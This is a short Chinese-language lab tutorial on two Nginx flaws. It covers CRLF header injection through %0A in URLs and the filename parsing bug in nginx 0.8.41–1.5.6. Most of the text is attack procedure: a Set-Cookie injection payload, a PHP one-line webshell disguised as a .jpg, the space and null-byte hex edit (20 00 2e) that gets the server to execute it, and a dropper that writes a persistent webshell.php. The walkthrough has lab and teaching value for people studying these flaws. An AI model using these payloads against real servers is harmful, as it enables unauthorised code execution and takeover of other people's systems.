Nginx相关漏洞解析
一、CRLF注入漏洞
原理:Nginx将传入的url进行解码,对其中的%0a%0d替换成换行符,导致后面的数据注入至头部,造成CRLF 注入漏洞
1、开环境
2、访问网站,并抓包
3、构造请求头
%0ASet-cookie:JSPSESSID%3D1
这样就可以看到响应头里有我们刚刚添加的cookie了
二、文件名逻辑漏洞
原理:非法字符空格和截止符(\0)会导致Nginx解析URI时的有限状态机混乱,此漏洞可导致目录跨越及代码执行,其影响版本为:nginx 0.8.41 – 1.5.6
1、开环境
2、制造木马
在我们本地新建一个1.jpg(因为这里只能上传图片文件)里面写入一句话木马
<?php @eval($_POST[cmd]);?>
3、上传木马,抓包
4、修改数据包
在文件名的最后加个空格,就可以把木马上传进去
5、放行,访问木马
这里看到木马已经上传进去了
(1)直接访问是访问不到的,我们需要在文件名后加...php然后抓包
(2)抓到包之后修改数据包,把2e 2e 2e修改为20 00 2e
(3)放行
修改完成之后放行就可以访问到木马了
6、测试连接
这里发现我们的木马文件虽然传上去了,但是因为我们的木马文件被编码了,所以直接连是连不上的,所以我们需要重新构造木马文件
7、重新构造文件上传
这串代码的意思是:在当前目录生成一个webshell.php文件,里面是一句话木马
<?php fputs(fopen('webshell.php','w'),'<?php @eval($_POST["cmd"])?>');?>
上传2.jpg,抓包,加空格,放行
访问刚刚上传的文件,这一步是为了执行代码
/uploadfiles/2.jpg...php
还是抓包,修改为20 00 2e
执行成功之后去访问我们木马里写的webshell.php文件
8、访问成功,测试连接
